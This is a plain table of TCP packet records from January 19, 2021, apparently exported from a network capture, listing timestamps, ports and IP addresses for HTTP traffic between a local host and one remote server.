Jan 19, 2021 12:13:04.191555023 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191586018 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191596031 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.191615105 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191647053 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191677094 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191720009 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191759109 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191762924 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.191778898 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.191795111 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.192589045 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238148928 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238217115 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238260031 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238297939 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238337040 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238377094 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238379002 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238409042 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238415003 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238455057 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238461018 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238492012 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238542080 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238585949 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238622904 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238626003 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238636971 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238661051 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238698959 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238722086 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238735914 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238744974 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238775015 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238812923 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238859892 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238903999 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238940954 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.238965034 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.238996029 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.284861088 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.284925938 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.284967899 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285005093 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285054922 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285078049 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285098076 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285118103 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285136938 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285177946 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285218000 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285254002 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285276890 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285291910 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285331011 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285377979 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285444021 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285466909 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285490036 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285532951 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285573959 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285613060 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285650015 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285669088 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285686970 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285702944 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285725117 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285731077 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.285763025 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285809994 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285842896 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285872936 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285903931 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285933971 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285964966 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.285995960 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286005974 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.286036015 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286073923 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286078930 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.286098003 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.286112070 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286129951 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.286149979 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286186934 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286225080 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286262035 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286309958 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286319971 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.286351919 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286390066 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286428928 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286468029 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.286524057 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.332763910 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.332823992 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.332865000 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.332902908 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.332941055 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.332943916 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.332987070 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.332987070 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333029985 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333067894 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333106041 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333112001 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333143950 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333180904 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333219051 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333256960 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333304882 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333312035 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333348989 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333439112 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333483934 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333530903 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333571911 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333595037 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333612919 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333643913 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333683014 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333729982 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333765984 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333770990 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333786011 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333807945 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333812952 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333847046 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333885908 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333921909 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333933115 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333956957 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.333961010 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.333997965 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334044933 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334086895 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334125996 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334162951 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334178925 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334201097 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334212065 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334237099 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334247112 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334275007 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334311962 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334357977 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334398985 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334410906 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334439993 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334441900 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334477901 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334516048 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334552050 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334592104 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334603071 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334629059 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334676027 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334717989 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334755898 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334770918 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334794998 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334836006 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334872007 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334908962 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334933996 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334948063 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.334959030 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.334995031 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335036039 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335072994 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335112095 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335130930 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335150957 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335165024 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335187912 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335191011 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335226059 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335263014 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335309982 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335351944 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335367918 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335388899 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335395098 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335427046 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335464954 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335500002 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335537910 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335555077 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335577011 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335591078 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335623026 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335664034 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335701942 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335737944 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335753918 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335774899 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335779905 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335809946 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335849047 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335886955 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335907936 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335932970 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.335933924 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.335973978 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.336354971 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.381979942 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382038116 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382107973 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382106066 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382138014 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382181883 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382220984 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382256985 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382292032 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382296085 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382313967 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382334948 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382366896 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382381916 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382426023 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382460117 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382466078 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382488966 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382503986 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382514000 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382544041 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382565022 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382586002 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382616043 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382632017 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382669926 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382673025 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382687092 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382716894 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382734060 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382760048 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382797956 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382837057 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382838011 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382854939 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382874012 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382910967 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382910967 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382949114 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.382956982 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382966042 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.382986069 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383033037 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383074999 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383111954 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383150101 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383172989 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383187056 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383239031 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383255959 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383275032 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383279085 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383316994 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383317947 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383348942 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383354902 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383379936 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383392096 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383430004 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383430958 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383476973 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383488894 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383517027 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383521080 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383547068 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383555889 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383590937 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383596897 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383610010 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383634090 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383671999 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383694887 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383711100 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383742094 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383747101 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383759022 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383793116 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383826017 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383855104 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383893013 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383929968 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383968115 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.383971930 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383981943 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.383999109 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384005070 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384032011 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384041071 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384078026 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384094000 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384115934 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384135008 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384162903 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384203911 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384239912 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384278059 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384315014 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384334087 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384351015 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384376049 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384387970 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384403944 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384426117 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384449959 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384471893 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384479046 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384512901 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384529114 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384550095 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384573936 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384588957 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384608030 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384625912 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384660959 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384699106 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384736061 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384752989 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384783030 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.384797096 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.384823084 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.385673046 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:05.243830919 CET	49768	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:05.243967056 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:06.295949936 CET	49769	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:06.296226025 CET	49770	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:06.341886997 CET	80	49769	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:06.341990948 CET	80	49770	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:06.342457056 CET	49770	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:06.342521906 CET	49769	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:06.343535900 CET	49769	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:06.389244080 CET	80	49769	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:06.422971010 CET	80	49769	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:06.423062086 CET	80	49769	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:06.423078060 CET	80	49769	185.186.244.49	192.168.2.3
